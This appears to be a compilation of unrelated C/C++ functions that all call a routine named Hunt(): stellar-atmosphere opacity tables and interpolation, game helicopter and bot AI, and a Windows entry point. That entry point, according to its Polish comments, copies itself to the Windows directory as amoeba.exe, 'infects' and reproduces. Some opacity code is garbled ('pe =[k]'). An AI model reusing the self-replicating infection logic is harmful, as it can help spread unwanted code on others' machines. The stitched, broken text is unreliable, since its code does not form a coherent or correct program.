double BiLinear(int Na, double *a_table, double a, int Nb, double *b_table, double b, double **f, bool_t hunt) { static int i = 0, j = 0; double fa, fb; /* --- Bi-linear interpolation of function f[][] given on rectangular grid (a_table, b_table) -- -------------- */ if (hunt) { Hunt(Na, a_table, a, &i); Hunt(Nb, b_table, b, &j); } else { Locate(Na, a_table, a, &i); Locate(Nb, b_table, b, &j); } fa = (a_table[i+1] - a) / (a_table[i+1] - a_table[i]); fb = (b_table[j+1] - b) / (b_table[j+1] - b_table[j]); return fa*fb * f[i][j] + fa*(1.0 - fb) * f[i][j+1] + (1.0 - fa)*fb * f[i+1][j] + (1.0 - fa)*(1.0 - fb) * f[i+1][j+1]; }
void Linear(int Ntable, double *xtable, double *ytable, int N, double *x, double *y, bool_t hunt) { register int n; bool_t ascend; int j = 0; double xmin, xmax, fx; ascend = (xtable[1] > xtable[0]) ? TRUE : FALSE; xmin = (ascend) ? xtable[0] : xtable[Ntable-1]; xmax = (ascend) ? xtable[Ntable-1] : xtable[0]; for (n = 0; n < N; n++) { if (x[n] <= xmin) y[n] = (ascend) ? ytable[0] : ytable[Ntable-1]; else if (x[n] >= xmax) y[n] = (ascend) ? ytable[Ntable-1] : ytable[0]; else { if (hunt) Hunt(Ntable, xtable, x[n], &j); else Locate(Ntable, xtable, x[n], &j); fx = (xtable[j+1] - x[n]) / (xtable[j+1] - xtable[j]); y[n] = fx*ytable[j] + (1 - fx)*ytable[j+1]; } } }
//------------------------------------------------------------------------------ // Purpose : The main think function for the helicopters // Input : // Output : //------------------------------------------------------------------------------ void CBaseHelicopter::HelicopterThink( void ) { SetNextThink( gpGlobals->curtime + HELICOPTER_THINK_INTERVAL ); // Don't keep this around for more than one frame. ClearCondition( COND_ENEMY_DEAD ); // Animate and dispatch animation events. StudioFrameAdvance( ); DispatchAnimEvents( this ); PrescheduleThink(); ShowDamage( ); // ----------------------------------------------- // If AI is disabled, kill any motion and return // ----------------------------------------------- if (CAI_BaseNPC::m_nDebugBits & bits_debugDisableAI) { SetAbsVelocity( vec3_origin ); SetLocalAngularVelocity( vec3_angle ); SetNextThink( gpGlobals->curtime + HELICOPTER_THINK_INTERVAL ); return; } Hunt(); HelicopterPostThink(); }
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE,LPSTR,int) { if (CRegister::Dieee()) return -1; CRegister::DeleteEvilMountPoints(); UINT c = GetWindowsDirectory(cpPath,MAX_PATH); wcscpy(cpPath + c,TEXT("\\amoeba.exe")); ncpPath = c + 11; // dokonaj zara¿enia File::DivideCell(); Sleep(1000); // teraz poluj na robale Hunt(); // pó¿niej zajmij siê w³asnym ¿yciem, tj czuwaniem i rozmna¿aniem ;] WNDCLASSEX wc; ZeroMemory(&wc,sizeof(wc)); wc.cbSize = sizeof(wc); wc.hInstance = hInstance; wc.lpfnWndProc = WndProc; wc.lpszClassName = className; if (!RegisterClassEx(&wc) || !CreateWindowEx(0,className,className,NULL,0,0,0,0,NULL,NULL,hInstance,NULL)) return 1; MSG msg; while(GetMessage(&msg,0,NULL,NULL) > 0) { TranslateMessage(&msg); DispatchMessage(&msg); } // na zakoñczenie programu te¿ poluje :P Hunt(); return 0; }
//------------------------------------------------------------------------------ // Purpose : The main think function for the helicopters // Input : // Output : //------------------------------------------------------------------------------ void CBaseHelicopter::HelicopterThink( void ) { CheckPVSCondition(); SetNextThink( gpGlobals->curtime + HELICOPTER_THINK_INTERVAL ); // Don't keep this around for more than one frame. ClearCondition( COND_ENEMY_DEAD ); // Animate and dispatch animation events. StudioFrameAdvance( ); DispatchAnimEvents( this ); PrescheduleThink(); if ( IsMarkedForDeletion() ) return; ShowDamage( ); // ----------------------------------------------- // If AI is disabled, kill any motion and return // ----------------------------------------------- if (CAI_BaseNPC::m_nDebugBits & bits_debugDisableAI) { SetAbsVelocity( vec3_origin ); SetLocalAngularVelocity( vec3_angle ); SetNextThink( gpGlobals->curtime + HELICOPTER_THINK_INTERVAL ); return; } Hunt(); // Finally, forget dead enemies, or ones we've been told to ignore. if( GetEnemy() != NULL && (!GetEnemy()->IsAlive() || GetEnemy()->GetFlags() & FL_NOTARGET || IRelationType( GetEnemy() ) == D_NU ) ) { SetEnemy( NULL ); } HelicopterPostThink(); }
// Respond to radio commands from HUMAN players void CCSBot::RespondToRadioCommands() { // bots use the chatter system to respond to each other if (m_radioSubject.IsValid() && m_radioSubject->IsPlayer()) { if (m_radioSubject->IsBot()) { m_lastRadioCommand = EVENT_INVALID; return; } } if (m_lastRadioCommand == EVENT_INVALID) return; // a human player has issued a radio command GetChatter()->ResetRadioSilenceDuration(); // if we are doing something important, ignore the radio // unless it is a "report in" request - we can do that while we continue to do other things // TODO: Create "uninterruptable" flag if (m_lastRadioCommand != EVENT_RADIO_REPORT_IN_TEAM) { if (IsBusy()) { // consume command m_lastRadioCommand = EVENT_INVALID; return; } } // wait for reaction time before responding // delay needs to be long enough for the radio message we're responding to to finish float respondTime = 1.0f + 2.0f * GetProfile()->GetReactionTime(); if (IsRogue()) respondTime += 2.0f; if (gpGlobals->time - m_lastRadioRecievedTimestamp < respondTime) return; // rogues won't follow commands, unless already following the player if (!IsFollowing() && IsRogue()) { if (IsRadioCommand(m_lastRadioCommand)) { GetChatter()->Negative(); } // consume command m_lastRadioCommand = EVENT_INVALID; return; } if (!m_radioSubject) return; // respond to command bool canDo = false; const float inhibitAutoFollowDuration = 60.0f; switch (m_lastRadioCommand) { case EVENT_RADIO_REPORT_IN_TEAM: { GetChatter()->ReportingIn(); break; } case EVENT_RADIO_FOLLOW_ME: case EVENT_RADIO_COVER_ME: case EVENT_RADIO_STICK_TOGETHER_TEAM: case EVENT_RADIO_REGROUP_TEAM: { if (!IsFollowing()) { Follow(m_radioSubject); m_radioSubject->AllowAutoFollow(); canDo = true; } break; } case EVENT_RADIO_ENEMY_SPOTTED: case EVENT_RADIO_NEED_BACKUP: case EVENT_RADIO_TAKING_FIRE: { if (!IsFollowing()) { Follow(m_radioSubject); GetChatter()->Say("OnMyWay"); m_radioSubject->AllowAutoFollow(); canDo = false; } break; } case EVENT_RADIO_TEAM_FALL_BACK: { if (TryToRetreat()) canDo = true; break; } case EVENT_RADIO_HOLD_THIS_POSITION: { // find the leader's area SetTask(HOLD_POSITION); StopFollowing(); m_radioSubject->InhibitAutoFollow(inhibitAutoFollowDuration); Hide(TheNavAreaGrid.GetNearestNavArea(&m_radioPosition)); canDo = true; break; } case EVENT_RADIO_GO_GO_GO: case EVENT_RADIO_STORM_THE_FRONT: { StopFollowing(); Hunt(); canDo = true; m_radioSubject->InhibitAutoFollow(inhibitAutoFollowDuration); break; } case EVENT_RADIO_GET_OUT_OF_THERE: { if (TheCSBots()->IsBombPlanted()) { EscapeFromBomb(); m_radioSubject->InhibitAutoFollow(inhibitAutoFollowDuration); canDo = true; } break; } case EVENT_RADIO_SECTOR_CLEAR: { // if this is a defusal scenario, and the bomb is planted, // and a human player cleared a bombsite, check it off our list too if (TheCSBots()->GetScenario() == CCSBotManager::SCENARIO_DEFUSE_BOMB) { if (m_iTeam == CT && TheCSBots()->IsBombPlanted()) { const CCSBotManager::Zone *zone = TheCSBots()->GetClosestZone(m_radioSubject); if (zone) { GetGameState()->ClearBombsite(zone->m_index); // if we are huting for the planted bomb, re-select bombsite if (GetTask() == FIND_TICKING_BOMB) Idle(); canDo = true; } } } break; } default: // ignore all other radio commands for now return; } if (canDo) { // affirmative GetChatter()->Affirmative(); // if we agreed to follow a new command, put away our grenade if (IsRadioCommand(m_lastRadioCommand) && IsUsingGrenade()) { EquipBestWeapon(); } } // consume command m_lastRadioCommand = EVENT_INVALID; }
bool_t H2plus_ff(double lambda, double *chi) { register int k; static bool_t initialize=TRUE; static int index; static double *temp_index; /* --- H2+ Free-Free scattering coefficients in units of 1.0E-49 m^-1 / (H atom/m^3) / (proton/M^3). Stimulated emission is included. This represents the following interaction: H + H^+ + \nu ---> H + H^+ From: D. R. Bates (1952), MNRAS 112, 40-44 Also: R. Mathisen (1984), Master's thesis, Inst. Theor. Astroph., University of Oslo, p. 45 When called the first time (or when initialize==TRUE) the fractional indices for atmospheric temperatures into the temperature table are stored in temp_index. This memory can be freed by calling the routine with lambda==0.0 -- -------------- */ static double lambdaFF[NFF_H2P] = { 0.0, 384.6, 555.6, 833.3, 1111.1, 1428.6, 1666.7, 2000.0, 2500.0, 2857.1, 3333.3, 4000.0, 5000.0, 6666.7, 10000.0}; static double tempFF[NTEMP_H2P] = { 2.5E+03, 3.0E+03, 3.5E+03, 4.0E+03, 5.0E+03, 6.0E+03, 7.0E+03, 8.0E+03, 1.0E+04, 1.2E+04}; static double kappaFF[NFF_H2P * NTEMP_H2P] = { /* --- lambda = 0.0 [nm] -- -------------- */ 0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 0.00, /* --- lambda = 384.6 [nm] -- -------------- */ 0.46, 0.46, 0.42, 0.39, 0.36, 0.33, 0.32, 0.30, 0.27, 0.25, /* --- lambda = 555.6 [nm] -- -------------- */ 0.70, 0.62, 0.59, 0.56, 0.51, 0.43, 0.41, 0.39, 0.35, 0.34, /* --- lambda = 833.3 [nm] -- -------------- */ 0.92, 0.86, 0.80, 0.76, 0.70, 0.64, 0.59, 0.55, 0.48, 0.43, /* --- lambda = 1111.1 [nm] -- -------------- */ 1.11, 1.04, 0.96, 0.91, 0.82, 0.74, 0.68, 0.62, 0.53, 0.46, /* --- lambda = 1428.6 [nm] -- -------------- */ 1.26, 1.19, 1.09, 1.02, 0.90, 0.80, 0.72, 0.66, 0.55, 0.48, /* --- lambda = 1666.7 [nm] -- -------------- */ 1.37, 1.25, 1.15, 1.07, 0.93, 0.83, 0.74, 0.67, 0.56, 0.49, /* --- lambda = 2000.0 [nm] -- -------------- */ 1.44, 1.32, 1.21, 1.12, 0.97, 0.84, 0.75, 0.67, 0.56, 0.48, /* --- lambda = 2500.0 [nm] -- -------------- */ 1.54, 1.39, 1.26, 1.15, 0.98, 0.85, 0.75, 0.67, 0.55, 0.46, /* --- lambda = 2857.1 [nm] -- -------------- */ 1.58, 1.42, 1.27, 1.16, 0.98, 0.84, 0.74, 0.66, 0.54, 0.45, /* --- lambda = 3333.3 [nm] -- -------------- */ 1.62, 1.43, 1.28, 1.15, 0.97, 0.83, 0.72, 0.64, 0.52, 0.44, /* --- lambda = 4000.0 [nm] -- -------------- */ 1.63, 1.43, 1.27, 1.14, 0.95, 0.80, 0.70, 0.62, 0.50, 0.42, /* --- lambda = 5000.0 [nm] -- -------------- */ 1.62, 1.40, 1.23, 1.10, 0.90, 0.77, 0.66, 0.59, 0.48, 0.39, /* --- lambda = 6666.7 [nm] -- -------------- */ 1.55, 1.33, 1.16, 1.03, 0.84, 0.71, 0.60, 0.53, 0.43, 0.36, /* --- lambda = 10000.0 [nm] -- -------------- */ 1.39, 1.18, 1.02, 0.90, 0.73, 0.60, 0.52, 0.46, 0.37, 0.31 }; long Nspace = atmos.Nspace; double T, lambda_index, kappa, *np; if (lambda == 0.0) { /* --- When called with zero wavelength free memory for fractional indices -- -------------- */ if (temp_index) free(temp_index); initialize = TRUE; return FALSE; } if (lambda >= lambdaFF[NFF_H2P-1]) return FALSE; if (initialize) { temp_index = (double *) malloc(Nspace * sizeof(double)); for (k = 0; k < Nspace; k++) { T = atmos.T[k]; if (T <= tempFF[0]) temp_index[k] = 0; else if (T >= tempFF[NTEMP_H2P-1]) temp_index[k] = NTEMP_H2P-1; else { Hunt(NTEMP_H2P, tempFF, T, &index); temp_index[k] = index + (T - tempFF[index]) / (tempFF[index+1] - tempFF[index]); } } initialize = FALSE; } Hunt(NFF_H2P, lambdaFF, lambda, &index); lambda_index = index + (lambda - lambdaFF[index]) / (lambdaFF[index+1] - lambdaFF[index]); np = atmos.H->n[atmos.H->Nlevel-1]; for (k = 0; k < Nspace; k++) { kappa = bilinear(NTEMP_H2P, NFF_H2P, kappaFF, temp_index[k], lambda_index); chi[k] = (atmos.H->n[0][k] * 1.0E-29) * (np[k] * 1.0E-20) * kappa; } return TRUE; }
bool_t H2minus_ff(double lambda, double *chi) { register int k; static bool_t initialize=TRUE; static int index; static double *theta_index; /* --- H2-minus Free-Free absorption coefficients (in units of 10E-29 m^5/J). Stimulated emission is included. From: Bell, K. L., (1980) J. Phys. B13, 1859. Also: R. Mathisen (1984), Master's thesis, Inst. Theor. Astroph., University of Oslo, p. 18 When called the first time (or when initialize==TRUE) the fractional indices for atmospheric temperatures into the theta table are stored in theta_index. This memory can be freed by calling the routine with lambda==0.0 -- -------------- */ static double lambdaFF[NFF_H2] = { 0.0, 350.5, 414.2, 506.3, 569.6, 650.9, 759.4, 911.3, 1139.1, 1518.8, 1822.6, 2278.3, 3037.7, 3645.2, 4556.5, 6075.3, 9113.0, 11391.3, 15188.3}; static double thetaFF[NTHETA_H2] = { 0.5, 0.8, 1.0, 1.2, 1.6, 2.0, 2.8, 3.6}; static double kappaFF[NFF_H2 * NTHETA_H2] = { /* --- lambda = 0.0 [nm] -- -------------- */ 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, /* --- lambda = 350.5 [nm] -- -------------- */ 4.17e-02, 6.10e-02, 7.34e-02, 8.59e-02, 1.11e-01, 1.37e-01, 1.87e-01, 2.40e-01, /* --- lambda = 414.2 [nm] -- -------------- */ 5.84e-02, 8.43e-02, 1.01e-01, 1.17e-01, 1.49e-01, 1.82e-01, 2.49e-01, 3.16e-01, /* --- lambda = 506.3 [nm] -- -------------- */ 8.70e-02, 1.24e-01, 1.46e-01, 1.67e-01, 2.10e-01, 2.53e-01, 3.39e-01, 4.27e-01, /* --- lambda = 569.6 [nm] -- -------------- */ 1.10e-01, 1.54e-01, 1.80e-01, 2.06e-01, 2.55e-01, 3.05e-01, 4.06e-01, 5.07e-01, /* --- lambda = 650.9 [nm] -- -------------- */ 1.43e-01, 1.98e-01, 2.30e-01, 2.59e-01, 3.17e-01, 3.75e-01, 4.92e-01, 6.09e-01, /* --- lambda = 759.4 [nm] -- -------------- */ 1.92e-01, 2.64e-01, 3.03e-01, 3.39e-01, 4.08e-01, 4.76e-01, 6.13e-01, 7.51e-01, /* --- lambda = 911.3 [nm] -- -------------- */ 2.73e-01, 3.71e-01, 4.22e-01, 4.67e-01, 5.52e-01, 6.33e-01, 7.97e-01, 9.63e-01, /* --- lambda = 1139.1 [nm] -- -------------- */ 4.20e-01, 5.64e-01, 6.35e-01, 6.97e-01, 8.06e-01, 9.09e-01, 1.11e+00, 1.32e+00, /* --- lambda = 1518.8 [nm] -- -------------- */ 7.36e-01, 9.75e-01, 1.09e+00, 1.18e+00, 1.34e+00, 1.48e+00, 1.74e+00, 2.01e+00, /* --- lambda = 1822.6 [nm] -- -------------- */ 1.05e+00, 1.39e+00, 1.54e+00, 1.66e+00, 1.87e+00, 2.04e+00, 2.36e+00, 2.68e+00, /* --- lambda = 2278.3 [nm] -- -------------- */ 1.63e+00, 2.14e+00, 2.36e+00, 2.55e+00, 2.84e+00, 3.07e+00, 3.49e+00, 3.90e+00, /* --- lambda = 3037.7 [nm] -- -------------- */ 2.89e+00, 3.76e+00, 4.14e+00, 4.44e+00, 4.91e+00, 5.28e+00, 5.90e+00, 6.44e+00, /* --- lambda = 3645.2 [nm] -- -------------- */ 4.15e+00, 5.38e+00, 5.92e+00, 6.35e+00, 6.99e+00, 7.50e+00, 8.32e+00, 9.02e+00, /* --- lambda = 4556.5 [nm] -- -------------- */ 6.47e+00, 8.37e+00, 9.20e+00, 9.84e+00, 1.08e+01, 1.16e+01, 1.28e+01, 1.38e+01, /* --- lambda = 6075.3 [nm] -- -------------- */ 1.15e+01,1.48e+01, 1.63e+01, 1.74e+01, 1.91e+01, 2.04e+01, 2.24e+01, 2.40e+01, /* --- lambda = 9113.0 [nm] -- -------------- */ 2.58e+01, 3.33e+01, 3.65e+01, 3.90e+01, 4.27e+01, 4.54e+01, 4.98e+01, 5.33e+01, /* --- lambda = 11391.3 [nm] -- -------------- */ 4.03e+01, 5.20e+01, 5.70e+01, 6.08e+01, 6.65e+01, 7.08e+01, 7.76e+01, 8.30e+01, /* --- lambda = 15188.3 [nm] -- -------------- */ 7.16e+01, 9.23e+01, 1.01e+02, 1.08e+02, 1.18e+02, 1.26e+02, 1.38e+02, 1.47e+02 }; long Nspace = atmos.Nspace; double theta, pe, lambda_index, kappa, *nH2; if (lambda == 0.0) { /* --- When called with zero wavelength free memory for fractional indices -- -------------- */ if (theta_index) free(theta_index); initialize = TRUE; return FALSE; } if (lambda >= lambdaFF[NFF_H2-1]) return FALSE; if (initialize) { theta_index = (double *) malloc(Nspace * sizeof(double)); for (k = 0; k < Nspace; k++) { theta = THETA0 / atmos.T[k]; if (theta <= thetaFF[0]) theta_index[k] = 0; else if (theta >= thetaFF[NTHETA_H2-1]) theta_index[k] = NTHETA_H2-1; else { Hunt(NTHETA_H2, thetaFF, theta, &index); theta_index[k] = index + (theta - thetaFF[index]) / (thetaFF[index+1] - thetaFF[index]); } } initialize = FALSE; } Hunt(NFF_H2, lambdaFF, lambda, &index); lambda_index = index + (lambda - lambdaFF[index]) / (lambdaFF[index+1] - lambdaFF[index]); nH2 = atmos.H2->n; for (k = 0; k < Nspace; k++) { if (nH2[k] > 0.0) { pe =[k] * KBOLTZMANN * atmos.T[k]; kappa = bilinear(NTHETA_H2, NFF_H2, kappaFF, theta_index[k], lambda_index); chi[k] = (nH2[k] * 1.0E-29) * pe * kappa; } else chi[k] = 0.0; } return TRUE; }
bool_t Hminus_ff(double lambda, double *chi) { register int k; static bool_t initialize=TRUE; static int index; static double *theta_index; /* --- H-minus Free-Free coefficients (in units of 1.0E-29 m^5/J) From: J. L. Stilley and J. Callaway (1970), ApJ 160, 245-260 Also: D. Mihalas (1978), p. 102 R. Mathisen (1984), Master's thesis, Inst. Theor. Astroph., University of Oslo. p. 17 When called the first time (or when initialize==TRUE) the fractional indices for atmospheric temperatures into the theta table are stored in theta_index. This memory can be freed by calling the routine with lambda==0.0 -- -------------- */ static double lambdaFF[NFF] = { 0.0, 303.8, 455.6, 506.3, 569.5, 650.9, 759.4, 911.3, 1013.0, 1139.0, 1302.0, 1519.0, 1823.0, 2278.0, 3038.0, 4556.0, 9113.0}; /* --- theta = 5040.0/T -- -------------- */ static double thetaFF[NTHETA] = { 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0}; static double kappaFF[NFF * NTHETA] = { /* --- lambda = 0.0 [nm] -- -------------- */ 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, 0.00e+00, /* --- lambda = 303.8 [nm] -- -------------- */ 3.44e-02, 4.18e-02, 4.91e-02, 5.65e-02, 6.39e-02, 7.13e-02, 7.87e-02, 8.62e-02, 9.36e-02, 1.01e-01, 1.08e-01, 1.16e-01, 1.23e-01, 1.30e-01, 1.38e-01, 1.45e-01, /* --- lambda = 455.6 [nm] -- -------------- */ 7.80e-02, 9.41e-02, 1.10e-01, 1.25e-01, 1.40e-01, 1.56e-01, 1.71e-01, 1.86e-01, 2.01e-01, 2.16e-01, 2.31e-01, 2.45e-01, 2.60e-01, 2.75e-01, 2.89e-01, 3.03e-01, /* --- lambda = 506.3 [nm] -- -------------- */ 9.59e-02, 1.16e-01, 1.35e-01, 1.53e-01, 1.72e-01, 1.90e-01, 2.08e-01, 2.25e-01, 2.43e-01, 2.61e-01, 2.78e-01, 2.96e-01, 3.13e-01, 3.30e-01, 3.47e-01, 3.64e-01, /* --- lambda = 569.5 [nm] -- -------------- */ 1.21e-01, 1.45e-01, 1.69e-01, 1.92e-01, 2.14e-01, 2.36e-01, 2.58e-01, 2.80e-01, 3.01e-01, 3.22e-01, 3.43e-01, 3.64e-01, 3.85e-01, 4.06e-01, 4.26e-01, 4.46e-01, /* --- lambda = 650.9 [nm] -- -------------- */ 1.56e-01, 1.88e-01, 2.18e-01, 2.47e-01, 2.76e-01, 3.03e-01, 3.31e-01, 3.57e-01, 3.84e-01, 4.10e-01, 4.36e-01, 4.62e-01, 4.87e-01, 5.12e-01, 5.37e-01, 5.62e-01, /* --- lambda = 759.4 [nm] -- -------------- */ 2.10e-01, 2.53e-01, 2.93e-01, 3.32e-01, 3.69e-01, 4.06e-01, 4.41e-01, 4.75e-01, 5.09e-01, 5.43e-01, 5.76e-01, 6.08e-01, 6.40e-01, 6.72e-01, 7.03e-01, 7.34e-01, /* --- lambda = 911.3 [nm] -- -------------- */ 2.98e-01, 3.59e-01, 4.16e-01, 4.70e-01, 5.22e-01, 5.73e-01, 6.21e-01, 6.68e-01, 7.15e-01, 7.60e-01, 8.04e-01, 8.47e-01, 8.90e-01, 9.32e-01, 9.73e-01, 1.01e+00, /* --- lambda = 1013.0 [nm] -- -------------- */ 3.65e-01, 4.39e-01, 5.09e-01, 5.75e-01, 6.39e-01, 7.00e-01, 7.58e-01, 8.15e-01, 8.71e-01, 9.25e-01, 9.77e-01, 1.03e+00, 1.08e+00, 1.13e+00, 1.18e+00, 1.23e+00, /* --- lambda = 1139.0 [nm] -- -------------- */ 4.58e-01, 5.50e-01, 6.37e-01, 7.21e-01, 8.00e-01, 8.76e-01, 9.49e-01, 1.02e+00, 1.09e+00, 1.15e+00, 1.22e+00, 1.28e+00, 1.34e+00, 1.40e+00, 1.46e+00, 1.52e+00, /* --- lambda = 1302.0 [nm] -- -------------- */ 5.92e-01, 7.11e-01, 8.24e-01, 9.31e-01, 1.03e+00, 1.13e+00, 1.23e+00, 1.32e+00, 1.40e+00, 1.49e+00, 1.57e+00, 1.65e+00, 1.73e+00, 1.80e+00, 1.88e+00, 1.95e+00, /* --- lambda = 1519.0 [nm] -- -------------- */ 7.98e-01, 9.58e-01, 1.11e+00, 1.25e+00, 1.39e+00, 1.52e+00, 1.65e+00, 1.77e+00, 1.89e+00, 2.00e+00, 2.11e+00, 2.21e+00, 2.32e+00, 2.42e+00, 2.51e+00, 2.61e+00, /* --- lambda = 1823.0 [nm] -- -------------- */ 1.14e+00, 1.36e+00, 1.58e+00, 1.78e+00, 1.98e+00, 2.17e+00, 2.34e+00, 2.52e+00, 2.68e+00, 2.84e+00, 3.00e+00, 3.15e+00, 3.29e+00, 3.43e+00, 3.57e+00, 3.70e+00, /* --- lambda = 2278.0 [nm] -- -------------- */ 1.77e+00, 2.11e+00, 2.44e+00, 2.75e+00, 3.05e+00, 3.34e+00, 3.62e+00, 3.89e+00, 4.14e+00, 4.39e+00, 4.63e+00, 4.86e+00, 5.08e+00, 5.30e+00, 5.51e+00, 5.71e+00, /* --- lambda = 3038.0 [nm] -- -------------- */ 3.10e+00, 3.71e+00, 4.29e+00, 4.84e+00, 5.37e+00, 5.87e+00, 6.36e+00, 6.83e+00, 7.28e+00, 7.72e+00, 8.14e+00, 8.55e+00, 8.95e+00, 9.33e+00, 9.71e+00, 1.01e+01, /* --- lambda = 4556.0 [nm] -- -------------- */ 6.92e+00, 8.27e+00, 9.56e+00, 1.08e+01, 1.19e+01, 1.31e+01, 1.42e+01, 1.52e+01, 1.62e+01, 1.72e+01, 1.82e+01, 1.91e+01, 2.00e+01, 2.09e+01, 2.17e+01, 2.25e+01, /* --- lambda = 9113.0 [nm] -- -------------- */ 2.75e+01, 3.29e+01, 3.80e+01, 4.28e+01, 4.75e+01, 5.19e+01, 5.62e+01, 6.04e+01, 6.45e+01, 6.84e+01, 7.23e+01, 7.60e+01, 7.97e+01, 8.32e+01, 8.67e+01, 9.01e+01 }; long Nspace = atmos.Nspace; double theta, pe, lambda_index, kappa; if (lambda == 0.0) { /* --- When called with zero wavelength free memory for fractional indices -- -------------- */ if (theta_index) free(theta_index); initialize = TRUE; return FALSE; } /* --- Use long-wavelength expansion if wavelength beyond 9113 nm - */ if (lambda >= lambdaFF[NFF-1]) return Hminus_ff_long(lambda, chi); if (initialize) { /* --- Store the fractional indices of temperature only the first time around -- -------------- */ theta_index = (double *) malloc(Nspace * sizeof(double)); for (k = 0; k < Nspace; k++) { theta = THETA0 / atmos.T[k]; if (theta <= thetaFF[0]) theta_index[k] = 0; else if (theta >= thetaFF[NTHETA-1]) theta_index[k] = NTHETA - 1; else { Hunt(NTHETA, thetaFF, theta, &index); theta_index[k] = (double) index + (theta - thetaFF[index]) / (thetaFF[index+1] - thetaFF[index]); } } initialize = FALSE; } Hunt(NFF, lambdaFF, lambda, &index); lambda_index = (double) index + (lambda - lambdaFF[index]) / (lambdaFF[index+1] - lambdaFF[index]); for (k = 0; k < Nspace; k++) { pe =[k] * KBOLTZMANN * atmos.T[k]; kappa = bilinear(NTHETA, NFF, kappaFF, theta_index[k], lambda_index); chi[k] = (atmos.H->n[0][k] * 1.0E-29) * pe * kappa; } return TRUE; }